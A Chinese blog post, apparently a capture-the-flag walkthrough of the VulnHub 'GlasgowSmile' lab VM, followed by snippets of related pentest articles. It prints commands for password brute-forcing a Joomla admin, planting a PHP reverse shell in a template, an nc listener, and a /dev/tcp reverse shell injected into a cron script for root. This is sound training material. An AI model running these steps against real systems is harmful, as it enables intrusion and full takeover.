vulnhub之GlasgowSmile的实践

VSole2023-05-15 09:02:58

今天实践的是vulnhub的GlasgowSmile镜像,

下载地址,https://download.vulnhub.com/glasgowsmile/GlasgowSmile-v1.1.zip,

用workstation打开,直接从console上看到了地址,192.168.177.134,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.134,

有web服务,进行目录扫描,dirb http://192.168.177.134,

浏览器访问,http://192.168.177.134/joomla,

浏览器访问,http://192.168.177.134/joomla/administrator,

爬取密码字典,cewl http://192.168.177.134/joomla > dict.txt,

用Burp Suite的Intruder进行密码破解,取变量,

导入字典,

确认了用户名密码,joomla/Gotham,

浏览器登录,http://192.168.177.134/joomla/administrator,

取web shell内容,

cat /usr/share/webshells/php/php-reverse-shell.php,

填到templates/protostar/index.php里,

kali攻击机上开启反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.177.134/joomla/templates/protostar/index.php,获取到反弹shell,

当前账户下查找到数据库的用户名密码,joomla/babyjoker,

访问数据库,

查找到rob账户的密码,是base64编码的,

解码得到明文,???AllIHaveAreNegativeThoughts???,

echo Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ | base64 -d,

切换到rob账户,su rob,获取到加密信息,

访问https://gchq.github.io/CyberChef,

使用ROT13 Amount=1解密,

获取到账户abner的密码,也是base64加密的,

解码得到明文,I33hope99my0death000makes44more8cents00than0my0life0,

echo STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA== | base64 -d,

切到abner账户,su abner,

获取到一个压缩文件,靶机上没有权限解压,下载到kali攻击机上解压,

获取到penguin账户和密码scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz,

这回ssh登录到靶机,

下载pspy64,wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64,

查看到定时执行的程序,

把反弹shell脚本添加到定时执行的程序里,

bash -c 'bash -i &>/dev/tcp/192.168.177.131/8888 0>&1',

过一会儿反弹shell就过来了,id确认是root,

shelljoomla
本作品采用《CC 协议》,转载必须注明作者和本文链接
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27单引号尝试:存在sql注入sqlmap 走起!跑数据 格式有点问题。获取到管理员加密后的密码$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu使用john 来破解john pwd --wordlist=/usr/share/wordlist/rockyou.txt admin/snoopy 登录后台3x0:后台篇在后台查找一番发现 类似于模板的页面可以利用模板的信息在结合上面的端口信息没有ssh应该是从web端进入 webshell?就接着用了4x0:提权篇查看系统的内核版本启动kali上的apache,把exp上传到服务器把exp下载到靶机解压exp授权脚本使用exp报错不影响使用获取到root权限5x0:flag获得
简介靶机作者:licong靶机描述:域控中存在一份重要文件 靶机主机有5台:ubantu、win2008、win7、win2012、centos 攻击主机:KALI、Win10拓扑图其中?会在文章中有变动,因为我搞这把靶场的时候中途关机过几次,随着开启启动VMware后DHCP会自动给它分配一个新的IP,所以我的?在文章中变成了
今天实践的是vulnhub的GlasgowSmile镜像,下载地址,https://download.vul
红队小技巧
2022-07-12 07:01:57
前言 有一段时间没有写文章了,也不知写什么,毕竟从攻击方换成防守方,乙方换到甲方,还有些许不适应。。。此外,本文为口嗨文,基本在说思路,没有实操。其实钓鱼的话可以配合弱口令去后台看看能不能改一些
发现三个开放端口:22,80,330680端口利用发现是一个joomla搭建的网站Joomla是一套全球知名的内容管理系统,是使用PHP语言加上MySQL数据库所开发的软件系统。
DC-3靶场实战详解
2023-02-15 10:42:44
雷神众测-杭州亚运会官方指定安全众测服务平台
对抗时红队模拟真实黑客的攻击行为,对企业网络应用系统进行渗透攻击,最终能发现企业平时未注意到的风险点,达到完善企业的安全体系的目的。本文站在红队攻击的角度,介绍一种在红队攻击初期快速通过已知Nday漏洞获取入口权限的思路,并编写成工具供红队渗透测试人员使用。红队攻击流程概述在红蓝对抗中红队的攻击流程大致可总结为以下几点情报收集 => 入口权限获取 => 内网信息探测 => 横向移动 => 权限维持
一个内网安全攻防的知识仓库
信息搜集:开源情报信息收集、创建企业密码字典进入内网:基于企业弱账号漏洞、基于系统漏洞进入、网站应用程序渗透隐匿攻击:Command and Control、代理内网跨边界应用:内网跨边界转发、内网跨边界代理穿透、shell反弹等
DeepExploit 是一种基于强化学习的自动化渗透框架,号称能够进行高效渗透,本文对该工具进行了分析并给出改进方向 本部分对DE(将DeepExploit简称为DE)利用到的核心工具做简单介绍,分为metasploit介绍和强化学习算法介绍,均为入门介绍,熟悉的读者可自行忽略。
VSole
网络安全专家